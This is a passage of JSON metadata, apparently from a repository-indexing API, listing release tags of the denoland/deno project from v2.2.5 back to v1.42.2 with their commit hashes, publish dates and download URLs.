ull,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/